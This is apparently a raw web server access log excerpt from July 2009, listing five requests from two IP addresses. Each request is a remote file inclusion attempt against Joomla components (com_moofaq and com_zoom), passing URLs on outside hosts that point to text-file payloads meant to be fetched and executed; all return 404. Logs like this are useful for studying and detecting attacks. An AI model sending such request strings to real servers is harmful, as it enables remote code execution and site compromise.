207.182.133.50 - - [13/Jul/2009:03:43:32 -0400] "GET //com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.182.133.50 - - [13/Jul/2009:03:43:36 -0400] "GET /logs/access_log.Q109063000%20%20//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:43:45 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:43:45 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:43:45 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
